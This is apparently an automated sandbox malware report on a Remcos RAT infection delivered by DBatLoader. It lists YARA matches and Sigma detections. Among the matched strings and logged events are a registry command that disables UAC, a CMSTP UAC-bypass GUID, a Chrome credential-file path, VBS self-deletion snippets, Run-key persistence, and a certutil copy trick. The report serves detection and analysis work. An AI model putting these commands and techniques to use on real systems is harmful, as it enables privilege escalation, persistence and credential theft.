19.2.colorcpl.exe.6f40000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x6572f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x656c3:$s1: CoGetObject 0x656d7:$s1: CoGetObject 0x656f3:$s1: CoGetObject 0x6f695:$s1: CoGetObject 0x65683:$s2: Elevation:Administrator!new:
30.2.SndVol.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
30.2.SndVol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
30.2.SndVol.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.SndVol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
30.2.SndVol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
30.2.SndVol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
30.2.SndVol.exe.4a71937.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
30.2.SndVol.exe.4a71937.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
30.2.SndVol.exe.4a71937.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.SndVol.exe.4a71937.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
30.2.SndVol.exe.4a71937.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
30.2.SndVol.exe.4a71937.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
30.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
30.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
30.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.SndVol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
30.2.SndVol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
30.2.SndVol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
19.2.colorcpl.exe.6f40000.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.2.colorcpl.exe.6f40000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.colorcpl.exe.6f40000.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.colorcpl.exe.6f40000.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c3ef:$a1: Remcos restarted by watchdog! 0x6c967:$a3: %02i:%02i:%02i:%03i
19.2.colorcpl.exe.6f40000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x66443:$str_a1: C:\Windows\System32\cmd.exe 0x663bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x663bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x668bf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x670ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x664b3:$str_b2: Executing file: 0x67533:$str_b3: GetDirectListeningPort 0x66edf:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6705f:$str_b7: \update.vbs 0x664db:$str_b9: Downloaded file: 0x664c7:$str_b10: Downloading file: 0x6656b:$str_b12: Failed to upload file: 0x674fb:$str_b13: StartForward 0x6751b:$str_b14: StopForward 0x66fb7:$str_b15: fso.DeleteFile " 0x66f4b:$str_b16: On Error Resume Next 0x66fe7:$str_b17: fso.DeleteFolder " 0x6655b:$str_b18: Uploaded file: 0x6651b:$str_b19: Unable to delete: 0x66f7f:$str_b20: while fso.FileExists(" 0x669f8:$str_c0: [Firefox StoredLogins not found]
19.2.colorcpl.exe.6f40000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x6632f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x662c3:$s1: CoGetObject 0x662d7:$s1: CoGetObject 0x662f3:$s1: CoGetObject 0x70295:$s1: CoGetObject 0x66283:$s2: Elevation:Administrator!new:
19.2.colorcpl.exe.6f41937.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.2.colorcpl.exe.6f41937.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.colorcpl.exe.6f41937.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.colorcpl.exe.6f41937.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
19.2.colorcpl.exe.6f41937.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
19.2.colorcpl.exe.6f41937.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
9.2.AnyDesk.PIF.2aa0000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
19.2.colorcpl.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.2.colorcpl.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.colorcpl.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.colorcpl.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
19.2.colorcpl.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
19.2.colorcpl.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
30.2.SndVol.exe.4a71937.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
30.2.SndVol.exe.4a71937.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
30.2.SndVol.exe.4a71937.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.SndVol.exe.4a71937.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
30.2.SndVol.exe.4a71937.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
30.2.SndVol.exe.4a71937.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
19.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.colorcpl.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.colorcpl.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
19.2.colorcpl.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
19.2.colorcpl.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
30.2.SndVol.exe.4a70000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
30.2.SndVol.exe.4a70000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
30.2.SndVol.exe.4a70000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.SndVol.exe.4a70000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b7ef:$a1: Remcos restarted by watchdog! 0x6bd67:$a3: %02i:%02i:%02i:%03i
30.2.SndVol.exe.4a70000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x65843:$str_a1: C:\Windows\System32\cmd.exe 0x657bf:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x657bf:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65cbf:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x664ef:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x658b3:$str_b2: Executing file: 0x66933:$str_b3: GetDirectListeningPort 0x662df:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x6645f:$str_b7: \update.vbs 0x658db:$str_b9: Downloaded file: 0x658c7:$str_b10: Downloading file: 0x6596b:$str_b12: Failed to upload file: 0x668fb:$str_b13: StartForward 0x6691b:$str_b14: StopForward 0x663b7:$str_b15: fso.DeleteFile " 0x6634b:$str_b16: On Error Resume Next 0x663e7:$str_b17: fso.DeleteFolder " 0x6595b:$str_b18: Uploaded file: 0x6591b:$str_b19: Unable to delete: 0x6637f:$str_b20: while fso.FileExists(" 0x65df8:$str_c0: [Firefox StoredLogins not found]
30.2.SndVol.exe.4a70000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x6572f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x656c3:$s1: CoGetObject 0x656d7:$s1: CoGetObject 0x656f3:$s1: CoGetObject 0x6f695:$s1: CoGetObject 0x65683:$s2: Elevation:Administrator!new:
19.2.colorcpl.exe.6f41937.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.2.colorcpl.exe.6f41937.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.colorcpl.exe.6f41937.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
19.2.colorcpl.exe.6f41937.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
19.2.colorcpl.exe.6f41937.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
19.2.colorcpl.exe.6f41937.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
Click to see the 68 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 6828, ProcessName: alpha.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Puyiaiob.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Puyiaiob

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 6828, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 6876, ProcessName: extrac32.exe

Sigma detected: Suspicious Creation with Colorcpl

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7088, TargetFilename: C:\ProgramData\ANYDESKS

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.217.19.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Puyiaiob.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Puyiaiob

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 3288, ProcessName: AnyDesk.PIF

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: E4 A7 6E AD 53 E0 44 C2 4E C2 25 A0 78 2F 30 9E 6F BA 5A AB D3 93 42 27 65 9D A1 C3 BF EA 4D F7 43 B2 93 D7 3F 91 4A 16 4A 96 29 C3 18 B4 B1 79 4B AE EA F3 3E F5 EA 3F 4E E3 30 DB 27 96 C4 74 BB A4 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B5YX7T\exepath

Suricata Signatures

